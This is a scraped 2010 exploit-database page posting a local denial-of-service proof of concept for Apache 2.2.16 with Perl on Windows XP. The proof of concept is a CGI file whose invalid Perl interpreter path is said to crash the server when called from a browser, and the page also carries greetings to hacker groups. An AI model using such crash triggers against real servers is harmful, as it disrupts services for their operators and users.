Home / os / win7

[dos / poc] - Apache 2.2 (Windows) Local Denial of Service

Posted on 26 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Apache 2.2 (Windows) Local Denial of Service | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Apache 2.2 (Windows) Local Denial of Service by FB1H2S in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>============================================ Apache 2.2 (Windows) Local Denial of Service ============================================ #!c:\perl\bin\ # ## # Exploit Title: Apache 2.2 local denail of service windows # Date: 25/10/2010 # Author: FB1H2S # Software Link: http://httpd.apache.org/. # Version: APACHE 2.2.16 # Tested on: wINDOWS xP SERVICE PACK 3 # CVE : ## ##Save the file as .pl in apache cgi-bin and Call this file from your browser and appache will ##crash throwing a debug prompt if configured ## Apache by default is configured with perl and Crash occurs when a perl cgi module tries to ##execute, calling the perl cgi binary from the &quot;c:\ path&quot; which is an invalid location. Apache ##by default restarts automatically on every crash. Tested on Apache 2.2.16 on windows xp. This ##bug ##is only affected on (Apache + perl) windows. ## ############################################################################################ #And all greets to Garage Hackers Members. #http://www.garage4hackers.com/forum.php an Information Security portal #And shouts to ICW, Andhra Hackers members #B0Nd,Eberly,Wipu,beenu,w4ri0r,empty,neo,Rohith,Sids786,SmartKD,Tia,h@xor,r5scal,Atul,Vinnu ############################################################################################# # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-26]</pre></body></html>

 

TOP